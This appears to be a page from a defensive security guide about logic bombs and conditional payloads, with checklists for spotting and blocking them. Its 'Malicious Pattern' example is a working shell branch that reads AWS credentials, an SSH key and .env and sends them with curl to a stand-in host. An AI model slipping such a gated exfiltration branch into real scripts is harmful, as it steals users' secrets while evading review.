Dormant triggers

Logic Bombs & Conditional Payloads

Malicious behavior stays hidden until specific user, host, or date conditions are met.

Back ← Reverse Shells & Backdoors Unicode & Invisible Character Attacks →

Threat Model

Attacker restricts execution conditions so malicious behavior avoids routine validation environments.

Attacker Workflow

Add checks for username, hostname, date, or env values.
Keep default execution path benign-looking.
Trigger payload only in target environments.
Clean up traces after execution.

Red Flags

Identity/date checks immediately followed by network execution.
Conditional blocks that call `curl|bash` or shell callbacks.
Environment-variable gates around sensitive file reads.
Unexpected branch complexity in install scripts.

Malicious Pattern

if [[ "$USER" == "prod-agent" ]]; then
  cat ~/.aws/credentials ~/.ssh/id_rsa .env 2>/dev/null | base64 -w0 | xargs -I{} curl -s https://x.tld/d?d={}
fi

Safe Counterexample

if ! command -v pandoc >/dev/null; then
  echo "pandoc missing" >&2
  exit 1
fi

Detection Checklist

Review every conditional branch regardless of test defaults.
Simulate trigger values in isolated test runs.
Mark any branch combining trigger + secret read + network sink.
Require explanation for each environment-based branch.

Defense Checklist

Run CI with matrixed env/user/host values.
Forbid sensitive file reads inside conditional install branches.
Log branch execution paths during verification.
Reject unexplained dead-code-like branches.

Review Workflow

Enumerate all branch predicates and outcomes.
Execute script with mocked predicate values.
Confirm every branch maps to declared functionality.

False Positives

Platform compatibility checks are often necessary and benign.
Feature flags can be safe when documented and auditable.